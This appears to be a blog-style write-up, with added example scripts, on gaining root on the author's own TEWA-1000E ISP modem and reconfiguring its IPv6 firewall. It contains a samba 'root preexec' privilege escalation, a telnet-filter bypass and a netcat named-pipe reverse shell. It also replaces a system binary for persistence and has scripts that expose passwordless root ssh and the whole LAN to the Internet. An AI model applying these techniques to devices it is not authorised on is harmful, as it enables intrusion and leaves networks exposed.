```text
# Typed into the telnet session: wget on its own fails, but the very same
# command run through "bash -c" works. So what we type is not reaching a
# normal shell at all; something in between is filtering it.
$ wget
Error!
$ bash -c 'wget'
BusyBox v1.28.3 (2021-08-12 18:03:54 CST) multi-call binary.
Usage: wget [-cq] [-O FILE] [-Y on/off] [-P DIR] [-S] [-U AGENT] [-T SEC] URL...
Retrieve files via HTTP or FTP
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-S Show server response
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y on/off Use proxy
```
```sh
#!/bin/sh
# Replacement for /opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord:
# start sshd on the first run after boot, then hand over to the stock binary
# (renamed ommonitord_stock) so the original functionality is unchanged.
FLAG_FILE=/var/ommonitord_first_run.log   # /var lives in RAM, so the flag resets on every reboot
if [ ! -f "$FLAG_FILE" ]; then
    date > "$FLAG_FILE"
    /opt/upt/apps/ssh/start_ssh.sh &
fi
cd /opt/upt/apps/apps/opt/apps/opmaintain/diagapps || exit 1
# exec keeps the stock daemon's PID and signals the same as before the swap
exec ./ommonitord_stock "$@"
```
```text
# ip -6 rule list
0: from all lookup local
102: from all fwmark 0x40000000/0xe0000000 lookup 102
102: from 240e:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx lookup 102
32766: from all lookup main
# ip -6 route list table 102
fe80::/64 dev br0 metric 1024 pref medium
default via fe80::xxxx:xxxx:xxxx:xxxx dev ppp1.2 proto ra metric 1024 expires 1511sec pref medium
```
```sh
# Remove the rule that forces packets sourced from the modem's own public address
# into table 102 (see "Open the modem's ssh port to the LAN" below). Link-local
# and ULA (fc00::/7, i.e. addresses starting with fc or fd) are skipped; the
# original filter matched the literal string "fc00::/7" and any "fd" inside the
# address, which also rejected valid public addresses.
IP6=$(ip -6 a show ppp1.2 | grep 'scope global' | grep -vE 'inet6 f[cd]' | awk '{print $2}' | cut -d'/' -f1 | head -n 1)
[ -n "$IP6" ] && ip -6 rule list | grep -Fe "$IP6" | grep -q 'lookup 102' && ip -6 rule del from "$IP6" lookup 102
```
```sh
#!/bin/sh
# /opt/upt/apps/fix_ip6tables.sh, first version: run once after boot from the
# ommonitord wrapper. This script modifies the IPv6 firewall to open ports.
# Caveat: the existence checks grep the text of "ip6tables -S". Some builds print
# the ICMPv6 protocol as "ipv6-icmp" rather than "icmpv6"; if a check never
# matches, its rule is re-inserted on every run. "ip6tables -C CHAIN RULE" is an
# exact existence test where the binary supports it.
open_ipv6_tcp_port() {
    if ip6tables -S INPUT | grep -Fe "-A INPUT -p tcp -m tcp --dport $1 -j ACCEPT" > /dev/null; then
        echo "TCP port $1 has been opened already!"
    else
        # No "-i": the port becomes reachable from every interface, WAN included
        ip6tables -I INPUT 1 -p tcp -m tcp --dport "$1" -j ACCEPT
        echo "Open TCP port $1"
    fi
}

# Fix the routing table by removing the unhealthy rule,
# otherwise PCs on LAN cannot connect to us via IPv6.
# Normally, we should not reject any connection from LAN.
# Take the first global address outside fc00::/7 (ULA starts with fc or fd).
IP6=$(ip -6 a show ppp1.2 | grep 'scope global' | grep -vE 'inet6 f[cd]' | awk '{print $2}' | cut -d'/' -f1 | head -n 1)
if [ -z "$IP6" ]; then
    echo "Cannot find a valid public IPv6 address, abort!"
    exit 1
fi
echo "IPv6: $IP6"
if ip -6 rule list | grep -Fe "$IP6" | grep 'lookup 102' > /dev/null; then
    ip -6 rule del from "$IP6" lookup 102
    echo "Unhealthy routing rule has been removed."
fi

# Change IPv6 firewall rules
# Enable Ping from the Internet: accept echo requests in, stop dropping echo replies out
if ip6tables -S INPUT | grep -Fe "-A INPUT -i ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 128 -j ACCEPT" > /dev/null; then
    echo "Ping is allowed."
else
    ip6tables -I INPUT -i ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 128 -j ACCEPT
    ip6tables -D output_firewall -o ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 129 -j DROP > /dev/null 2>&1
    echo "Ping has been enabled from the Internet."
fi

# Enable IPv6 forwarding from the Internet to LAN
# Warning: This will expose all your devices to the Internet!
# Please remember that the public Internet can be hostile,
# and make sure all of your devices have properly configured IPv6 firewall!
ip6tables -D forward_firewall -i ppp1.2 -j DROP > /dev/null 2>&1

# Enable ssh inbound (to this device only) from any interfaces
open_ipv6_tcp_port 22
exit 0
```
```sh
#!/bin/sh
# /opt/upt/app/monitor_ip6.sh: poll the WAN address and re-run the firewall fix
# whenever it changes. Started in the background by the ommonitord wrapper.

# Get the current global (non-ULA) IPv6 address of the WAN interface ppp1.2
get_ipv6() {
    ip -6 a show ppp1.2 | grep 'scope global' | grep -vE 'inet6 f[cd]' | awk '{print $2}' | cut -d'/' -f1 | head -n 1
}

on_ipv6_changed() {
    /opt/upt/apps/fix_ip6tables.sh "$1"
    # Update Cloudflare DDNS record once, async
    /opt/upt/apps/update_cf_ddns.sh "$1" &
}

# Initialize previous_ip with nothing
previous_ip=""
while true; do
    current_ip=$(get_ipv6)
    # Only act when the address differs from the last one seen
    if [ "$current_ip" != "$previous_ip" ]; then
        previous_ip="$current_ip"
        if [ -n "$current_ip" ]; then
            echo "IPv6 has changed to $current_ip, updating..."
            on_ipv6_changed "$current_ip"
        else
            echo "Unable to detect IPv6 address at $(date)" > /var/monitor_ip6.log
        fi
    else
        # Printed every cycle: redirect stdout when this runs in the background
        echo "No change in IPv6 address."
    fi
    # Wait for some time before checking again
    sleep 10
done
```
Then change fix_ip6tables.sh to:
```sh
#!/bin/sh
# /opt/upt/apps/fix_ip6tables.sh, second version: called by monitor_ip6.sh with
# the current WAN address as its only argument, once per address change.
# This script modifies the IPv6 firewall to open ports.
# Caveat: the "ip6tables -S" greps may need "ipv6-icmp" instead of "icmpv6" on
# some builds; an unmatched check re-inserts its rule on every run.
open_ipv6_tcp_port() {
    if ip6tables -S INPUT | grep -Fe "-A INPUT -p tcp -m tcp --dport $1 -j ACCEPT" > /dev/null; then
        echo "TCP port $1 has been opened already!"
    else
        # No "-i": reachable from every interface, WAN included
        ip6tables -I INPUT 1 -p tcp -m tcp --dport "$1" -j ACCEPT
        echo "Open TCP port $1"
    fi
}

if [ $# -lt 1 ]; then
    echo "Please supply the current IPv6 as the argument"
    exit 1
fi
IP6=$1

# Fix /etc/resolv.conf
echo 'nameserver ::1' > /etc/resolv.conf

# Fix the routing table by removing the unhealthy rule,
# otherwise PCs on LAN cannot connect to us via IPv6.
# Normally, we should not reject any connection from LAN.
if ip -6 rule list | grep -Fe "$IP6" | grep 'lookup 102' > /dev/null; then
    ip -6 rule del from "$IP6" lookup 102
    echo "Unhealthy routing rule has been removed."
else
    echo "Unhealthy routing rule was not found, skip."
fi

# Change IPv6 firewall rules
# Enable Ping from the Internet: accept echo requests in, stop dropping echo replies out
if ip6tables -S INPUT | grep -Fe "-A INPUT -i ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 128 -j ACCEPT" > /dev/null; then
    echo "Ping is allowed."
else
    ip6tables -I INPUT -i ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 128 -j ACCEPT
    ip6tables -D output_firewall -o ppp1.2 -p icmpv6 -m icmp6 --icmpv6-type 129 -j DROP > /dev/null 2>&1
    echo "Ping has been enabled from the Internet."
fi

# Enable IPv6 forwarding from the Internet to LAN
# Warning: This will expose all your devices to the Internet!
# Please remember that the public Internet can be hostile,
# and make sure all of your devices have properly configured IPv6 firewall!
ip6tables -D forward_firewall -i ppp1.2 -j DROP > /dev/null 2>&1
echo "Exposed IPv6 on LAN to the Internet."

# Enable ssh inbound from any interfaces
open_ipv6_tcp_port 22
exit 0
```
The 天邑 su tool and TelnetClient.exe found online do not work well: ticking "compute su" makes them crash, so another route seems necessary.
The tutorials online make it easy to obtain the super-administrator password and telnet access, but after logging in over telnet you are an ordinary user, not root, and the su password is unknown.
References
Update 2024-04-02 - First attempt
I have now found a way to get root without obtaining the su password. It abuses a permission mistake in how samba is deployed on the modem rather than a bug in samba itself: the samba daemon that serves the file shares runs as root, yet its configuration file /var/samba/smb.conf (a file in memory) is readable and writable by the ordinary user. So the idea is to modify /var/samba/smb.conf so that samba exports the modem's root directory / to remote clients with write access, then edit system files through that share with root privileges.
`echo $USER` returns telnet-user, the user we get by default after a telnet login, which has only basic rights. After adding the share to /var/samba/smb.conf, run the following command (missing from this copy of the page) and the new /var/samba/smb.conf takes effect. Connect from a Linux PC with
`sudo mount -t cifs -o rw,username=useradmin,password=<password printed on the back of the modem> //192.168.1.1/ty_root /tmp/ty_root`
(a `credentials=` file keeps the password out of the shell history and the process list), then edit /tmp/ty_root/var/group with sudo to add telnet-user to the root group. The final group file looks like this (not reproduced here). Commands such as `ip` now work, but not `iptables` and `ip6tables`;
those commands require the real root user, and for now there is no solution.

Update 2024-04-03 - Dumb luck
Pure dumb luck... There is now a way to get root directly without the su password, and it is unbelievably simple. Log in to telnet the usual way, then type a lone `;` and press Enter. It reports an error:
`sh: syntax error: unexpected ";"`
Ignore it. Now run `echo $USER` and you will find that we are root. lol. `iptables` and `ip6tables`, which could not be run before, now work too. The exact mechanism is unknown; it looks as though, after the telnet login, some program sits in front of the shell and filters the commands we type, for the following reasons (see the wget session reproduced at the top of this page: wget on its own fails, while the same command through `bash -c` works):
In addition, running su directly inside telnet asks for the su password, which is not the one recorded in /etc/passwd. Changing the password hash in /etc/passwd does not change the su password, which is puzzling. The /etc/passwd password does work with dropbear, however. To run dropbear, transfer the dropbear binary to the modem with netcat (the /var directory is recommended) together with a host key (e.g. dropbear_rsa_host_key). Then, as root inside telnet, run
`./dropbear -F -p 2222 -K 300 -T 3 -r dropbear_rsa_host_key`
to start dropbear listening on port 2222.

Reverse Shell
Since we know that commands typed into telnet are filtered, we need another way to reach a shell. First, on your Linux PC (say 192.168.1.100), run
`netcat -lvp 11451`
then in the modem's telnet (assuming telnet-user has already been added to the root group) run
`rm -f /var/fff;mknod /var/fff p;cat /var/fff|/bin/sh -i 2>&1|nc 192.168.1.100 11451 >/var/fff`
The netcat on the PC now takes over the shell, which is a lot more convenient to work with (note that this shell crosses the LAN in clear text).

Update 2024-04-04 - Adding ssh for a more convenient root shell
Put an OpenSSH server and its configuration into permanent storage; this is more convenient than telnet. It cannot be auto-started yet: after every reboot of the modem all the steps of the 2024-04-02 and 2024-04-04 updates must be repeated. Everything below builds on the 2024-04-02 update.
1. Edit /tmp/ty_root/var/samba/smb.conf and, at the end of the [ty_root] section added earlier, add the line
`root preexec = /opt/upt/apps/ssh/start_ssh.sh`
(smbd runs a root preexec command as root every time a client connects to the share, whichever user authenticated; that is what lets an unprivileged user get sshd started as root). The final file looks like this (not reproduced here). The USB_disc1 entry is my USB stick; yours may be named differently, ignore it.
2. Create the directory /tmp/ty_root/opt/upt/apps/ssh/ and put the three files from sshd_aarch64.tar.gz into it (the file list is not reproduced here).
3. `sudo umount /tmp/ty_root`
On the next connection to the share, /opt/upt/apps/ssh/start_ssh.sh is executed automatically; the script fixes the ownership of the ssh-related files, creates the directories it needs, and starts sshd if it is not already running. After that,
`ssh root@192.168.1.1`
logs in without a password, and the shell has root privileges, so be very careful! This shell can run `iptables` and `ip6tables`.
Disclaimer: the sshd in sshd_aarch64.tar.gz is a statically linked aarch64 ELF taken from alex-sector/static-binaries. Build it yourself if you do not trust it. The rest is already taken care of by start_ssh.sh.
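The [ty_root] share itself is not reproduced on this page. The following is an added example, not the post's smb.conf, of a minimal share carrying the root preexec hook, written as a shell helper that appends it to /var/samba/smb.conf from the telnet session. The share name, path, account name and the preexec command come from the post; the other option values are assumptions.

```sh
#!/bin/sh
# Added example, not the post's smb.conf. Appends a [ty_root] share to
# /var/samba/smb.conf (writable by telnet-user, read by an smbd running as
# root). Share name, path, account and the root preexec command are from the
# post; the remaining options are assumptions.
SMB_CONF=${SMB_CONF:-/var/samba/smb.conf}

# The share definition. smbd runs "root preexec" as root whenever a client
# connects to the share, whoever authenticated: that, plus the writable config,
# is the whole privilege escalation. While this section exists, the full root
# filesystem is writable by anyone on the LAN who knows the useradmin password,
# so remove it once sshd is in place.
ty_root_share() {
    cat <<'EOF'

[ty_root]
    path = /
    valid users = useradmin
    read only = no
    browseable = no
    root preexec = /opt/upt/apps/ssh/start_ssh.sh
EOF
}

# 0 if the file already contains a [ty_root] section header
has_ty_root() {
    grep -q '^[[:space:]]*\[ty_root\]' "$1" 2>/dev/null
}

# Append the share once; safe to re-run after every reboot (/var is RAM-backed).
add_ty_root() {
    if has_ty_root "$1"; then
        echo "[ty_root] already present in $1"
        return 0
    fi
    ty_root_share >> "$1" || return 1
    echo "[ty_root] appended to $1; reconnect the share to trigger root preexec"
}

if [ -f "$SMB_CONF" ]; then
    add_ty_root "$SMB_CONF"
else
    echo "$SMB_CONF not found: not running on the modem" >&2
fi
```

If writes through the share come back as permission denied, smbd is switching to the authenticated user for file access and a `force user = root` line (also an assumption) would be needed; the post's edits to /var/group suggest the modem's smbd keeps root.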
start_ssh.sh only starts sshd once.

Auto-start sshd at boot
After the steps above, sshd stays on flash and survives a reboot, but the modem does not start it on its own after rebooting. Following 0neday/OptiXstarHS8145X6, we can replace
/opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord
with a script of our own that tries to start the ssh server only on its first run, and that runs the original ommonitord every time it is invoked, so nothing is lost. First get a root shell over ssh, then rename ommonitord:
```sh
mv /opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord /opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord_stock
```
Then put our own script (reproduced near the top of this page: the one beginning with FLAG_FILE=/var/ommonitord_first_run.log) at
/opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord
Don't forget to make it executable:
```sh
chmod +x /opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord
```
After a reboot the modem now starts ssh by itself, and you can log in over ssh directly. Note that at this point the LAN side can only log in over IPv4 (`ssh root@192.168.1.1`), while from the WAN side the modem can be reached over IPv6. The routing on this modem is broken: LAN devices cannot reach the modem over IPv6 by default. The fix is described later.

Opening holes in the modem's IPv6 firewall
By default, the modem's IPv6 firewall drops all inbound IPv6 connections for safety. Some modems let you turn the IPv6 firewall off from the normal or super-administrator account, but the TEWA-1000E's admin pages have no such option, so a root shell is needed to configure it by hand.
Domestic users in China who have not ordered a special plan basically all get NATed IPv4 plus public IPv6 these days, so only IPv6 inbound needs to be considered. And IPv6 is the future anyway.

Open the modem's ssh port to the Internet
Here ppp1.2 is the modem's interface facing the Internet; check with `ip a`. Before doing this, check that sshd_config only allows public-key authentication for root: the login set up above needs no password, and after this rule it is reachable from the whole IPv6 Internet.
```sh
ip6tables -I INPUT 1 -i ppp1.2 -p tcp -m tcp --dport 22 -j ACCEPT
```
Open the modem's ssh port to the LAN
For some reason this modem's routing rules contain the following entry (the second line marked 102; the full `ip -6 rule list` and table 102 listings are reproduced near the top of this page). The third rule forces every packet sourced from the modem's own public address into routing table 102, and table 102 has only a link-local route on br0 plus a default route out of ppp1.2, so replies to devices on the br0 (LAN) side are sent towards the WAN instead: LAN devices cannot connect to the modem's IPv6 ssh and cannot ping it either. The fix is to remove the line
`102: from 240e:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx lookup 102`
(the commands are near the top of the page). Packets from the modem itself then follow the main routing table as normal, and IPv6 ssh and ping from the LAN work.
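As an added example (not code from the post), here is the address selection and the rule check done with whole-field matching rather than the grep chains used in the scripts near the top of the page, exercised on constructed listings shaped like the ones above. The addresses are made up; ppp1.2 is the page's WAN interface.

```sh
#!/bin/sh
# Added example, not from the original post. Picks the modem's public IPv6
# address out of "ip -6 a show ppp1.2" and tests for the "from <addr> lookup 102"
# rule with exact field matching. The sample listings below are constructed.
WAN_IF=${WAN_IF:-ppp1.2}

# Print the first "scope global" address outside fc00::/7 from ip(8) output on
# stdin. Tests the prefix of the address field, so 240e:...:4fd1:... is kept
# (the post's grep -vE 'fd[[:xdigit:]]{2,4}' would drop it) and a ULA such as
# fd00::1 is skipped.
global_ip6() {
    awk '$1 == "inet6" && /scope global/ {
             split($2, a, "/")
             if (a[1] !~ /^[fF][cCdD]/) { print a[1]; exit }
         }'
}

# Exit 0 if "ip -6 rule list" output on stdin contains "from $1 lookup 102".
# Whole-field comparison: 240e::1 must not also match 240e::10.
rule_102_present() {
    awk -v ip="$1" '$2 == "from" && $3 == ip && $4 == "lookup" && $5 == "102" { found = 1 }
                    END { exit found ? 0 : 1 }'
}

# What fix_ip6tables.sh does with the two helpers. Needs the device; not run here.
fix_rule_102() {
    ip6=$(ip -6 a show "$WAN_IF" | global_ip6)
    if [ -z "$ip6" ]; then
        echo "no public IPv6 address on $WAN_IF" >&2
        return 1
    fi
    if ip -6 rule list | rule_102_present "$ip6"; then
        ip -6 rule del from "$ip6" lookup 102
    fi
}

# Constructed "ip -6 a show ppp1.2" output: a ULA first, then the public address
# (which happens to contain "fd1"), then link-local.
SAMPLE_ADDR='12: ppp1.2: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1492 state UNKNOWN qlen 3
    inet6 fd00:1:2:3::1/64 scope global
       valid_lft forever preferred_lft forever
    inet6 240e:1:2:3:4fd1:5eff:fe00:1/64 scope global dynamic
       valid_lft 2591990sec preferred_lft 604790sec
    inet6 fe80::1/64 scope link
       valid_lft forever preferred_lft forever'

# Constructed "ip -6 rule list" output, same shape as the listing on this page.
SAMPLE_RULES='0:      from all lookup local
102:    from all fwmark 0x40000000/0xe0000000 lookup 102
102:    from 240e:1:2:3:4fd1:5eff:fe00:1 lookup 102
32766:  from all lookup main'

ip6=$(printf '%s\n' "$SAMPLE_ADDR" | global_ip6)
echo "public address: $ip6"
if printf '%s\n' "$SAMPLE_RULES" | rule_102_present "$ip6"; then
    echo "rule present: would run ip -6 rule del from $ip6 lookup 102"
fi
```

On the modem, fix_rule_102 replaces the `IP6=...` and `ip -6 rule del` lines of the scripts above; the two helpers are pure text filters, so they can be checked against a captured listing before the routing table is touched. A less intrusive alternative to deleting the rule (not what the post does) would be a higher-priority rule that sends only LAN-destined traffic to the main table, but that needs the LAN prefix, which this page does not show.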
Allow the Internet to ping the modem
Allow only ping (safe): the echo-request rule used in fix_ip6tables.sh near the top of the page (`--icmpv6-type 128`).
Allow all ICMP (possibly risky, strongly not recommended).
Open IPv6 forwarding so that PCs behind the modem can be reached from the public Internet over IPv6
If you do this, make absolutely sure every device behind the modem has a correctly configured firewall, and do not accidentally expose services that should not be on the public Internet! You can limit the exposure to the minimum set of ports by matching on the IPv6 host suffix and the port, which keeps the attack surface small; search online for how to do it.
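The suffix-and-port approach, as an added example that is not part of the post: instead of deleting the whole `-i ppp1.2 -j DROP` rule from forward_firewall as fix_ip6tables.sh does, insert ACCEPT rules ahead of it for chosen (host, protocol, port) triples. The chain name and WAN interface are the ones on this page; the allow-list, the helper names and the masking choice are assumptions.

```sh
#!/bin/sh
# Added example, not from the original post: expose chosen (host, protocol,
# port) triples through forward_firewall instead of deleting its catch-all
# "-i ppp1.2 -j DROP". Hosts are matched on the low 64 bits of their address
# (the interface identifier) with the mask ::ffff:ffff:ffff:ffff, so the rules
# survive a change of the ISP-assigned /64. Assumptions: chain name and WAN
# interface as on this page; the hosts keep a stable interface identifier
# (EUI-64 or a fixed token, not privacy extensions); the firmware's own rules
# already accept established return traffic. The allow-list is constructed.
WAN_IF=${WAN_IF:-ppp1.2}
CHAIN=${CHAIN:-forward_firewall}
APPLY=${APPLY:-0}                 # 0: print the commands, 1: execute them
IID_MASK='::ffff:ffff:ffff:ffff'  # compare only the host part of the address

# Accept "::" followed by one to four hextets, e.g. ::e2d5:5eff:fe12:3456
is_iid() {
    printf '%s\n' "$1" | grep -Eq '^::[0-9a-fA-F]{1,4}(:[0-9a-fA-F]{1,4}){0,3}$'
}

# Accept a decimal port 1..65535
is_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the ip6tables command for one exposure: $1 suffix, $2 tcp|udp, $3 port.
# "-I $CHAIN 1" places it ahead of the DROP rule the firmware installed.
fwd_rule() {
    is_iid "$1" || { echo "bad interface identifier: $1" >&2; return 1; }
    case "$2" in tcp|udp) ;; *) echo "bad protocol: $2" >&2; return 1 ;; esac
    is_port "$3" || { echo "bad port: $3" >&2; return 1; }
    printf 'ip6tables -I %s 1 -i %s -d %s/%s -p %s -m %s --dport %s -j ACCEPT\n' \
        "$CHAIN" "$WAN_IF" "$1" "$IID_MASK" "$2" "$2" "$3"
}

# Read "suffix proto port" lines on stdin (blank lines and # comments skipped)
# and print or run a rule for each; malformed lines are reported and skipped.
expose_from_list() {
    while read -r iid proto port _rest; do
        case "$iid" in ''|\#*) continue ;; esac
        cmd=$(fwd_rule "$iid" "$proto" "$port") || continue
        if [ "$APPLY" = 1 ]; then eval "$cmd"; else echo "$cmd"; fi
    done
}

# Constructed allow-list: HTTPS and ssh on one LAN host, WireGuard on another.
expose_from_list <<'EOF'
# interface-identifier      proto  port
::e2d5:5eff:fe12:3456       tcp    443
::e2d5:5eff:fe12:3456       tcp    22
::1                         udp    51820
EOF
```

Run it with `APPLY=1` on the modem once the printed rules look right. A host that uses privacy extensions changes its interface identifier regularly and will fall out of the rule; give such a host a fixed token or a static address first.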
Making the ip6tables changes persistent
No method found yet: the rootfs of this modem is squashfs, read-only. The only option is to look through the scripts in
/etc/init.d/
for ones that automatically run something from the writable partitions.

Update 2024-04-11 - ip6tables persistence
The method above for opening IPv6 firewall ports and forwarding does not survive a reboot, because Linux iptables rules are not persistent; they would have to be redone by hand every time. So we can use a startup script instead (fix_ip6tables.sh, reproduced near the top of this page). Save it as
/opt/upt/apps/fix_ip6tables.sh
and then, in the /opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord script changed above, add the line
`[ -f /opt/upt/apps/fix_ip6tables.sh ] && /opt/upt/apps/fix_ip6tables.sh`
after `date > $FLAG_FILE`. That is all. There is a latent problem, though: what if the modem does not reboot but its IPv6 address changes? Looking around, there seems to be no plain-text script on the modem that updates ip6tables. My attention is on the binary
/bin/smd
because it is mentioned elsewhere that /bin/smd is some kind of "main process" responsible for bringing up the DHCP service and generating the dhcpd configuration from the user's settings. So I suspect the firewall is also configured by this program, either from some user configuration file or hard-coded. This might be something to make use of:
https://www.bilibili.com/read/cv17822838/
https://www.cnblogs.com/geyee/p/15915361.html
https://www.cnblogs.com/tianpanyu/p/15611523.html
https://www.chinadsl.net/thread-166731-1-1.html
https://www.chinadsl.net/forum.php?mod=viewthread&action=printable&tid=158737
https://bbs.kanxue.com/thread-278640.htm
Update 2024-07-04 - Automatically updating IPv6
The steps described earlier do not update anything when the IPv6 address the modem receives changes for whatever reason, so we need a script that keeps running in the background and checks periodically. First create
/opt/upt/app/monitor_ip6.sh
with the content shown near the top of this page (the script with the get_ipv6 polling loop). Then change
fix_ip6tables.sh
to the second version shown there. The main change is that
fix_ip6tables.sh
receives the current IPv6 address from monitor_ip6.sh, and runs only once, when the address has changed. Finally, we modify the earlier
/opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord
script so that it no longer calls /opt/upt/apps/fix_ip6tables.sh directly, but instead starts /opt/upt/app/monitor_ip6.sh in the background. The resulting ommonitord content is as follows:
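The post's final ommonitord is not reproduced in this copy of the page. The following is an added reconstruction from the description above, not the author's file: it keeps the first-run flag and the exec of the stock binary from the earlier wrapper, starts start_ssh.sh and the monitor loop in the background on the first run after boot, and uses the paths given on this page. The environment overrides and the name check at the bottom are assumptions added so the logic can be exercised off the device.

```sh
#!/bin/sh
# Added example, not the post's own file: a reconstruction of the final
# /opt/upt/apps/apps/opt/apps/opmaintain/diagapps/ommonitord wrapper. On the
# first run after boot it starts sshd and the IPv6 monitor loop in the
# background, then execs the stock binary so the original functionality is
# unchanged. Paths are those used on this page; the environment overrides exist
# only to exercise the logic off the device.
DIAG_DIR=${DIAG_DIR:-/opt/upt/apps/apps/opt/apps/opmaintain/diagapps}
STOCK=${STOCK:-$DIAG_DIR/ommonitord_stock}
FLAG_FILE=${FLAG_FILE:-/var/ommonitord_first_run.log}   # /var is RAM-backed: resets on reboot
START_SSH=${START_SSH:-/opt/upt/apps/ssh/start_ssh.sh}
MONITOR=${MONITOR:-/opt/upt/app/monitor_ip6.sh}
MONITOR_LOG=${MONITOR_LOG:-/var/monitor_ip6.out}

# Succeed, and create the flag, only on the first call since boot; every later
# call returns 1 so the helpers are never started twice.
claim_first_run() {
    [ -f "$1" ] && return 1
    date > "$1"
}

# Start the helpers detached. The monitor loop never exits and prints on every
# cycle, so its output goes to a log instead of the stock daemon's stdout.
start_helpers() {
    if [ -x "$START_SSH" ]; then "$START_SSH" & fi
    if [ -x "$MONITOR" ]; then "$MONITOR" > "$MONITOR_LOG" 2>&1 & fi
}

main() {
    if claim_first_run "$FLAG_FILE"; then
        start_helpers
    fi
    if [ -x "$STOCK" ]; then
        cd "$DIAG_DIR" && exec "$STOCK" "$@"
    fi
    echo "ommonitord wrapper: stock binary $STOCK not found" >&2
    return 1
}

# Only act when installed under the real name; running the file under another
# name just defines the functions.
if [ "${0##*/}" = ommonitord ]; then
    main "$@"
fi
```

Install it at the ommonitord path after renaming the original to ommonitord_stock, `chmod +x` it as before, and check /var/monitor_ip6.out after a reboot to confirm the loop is running.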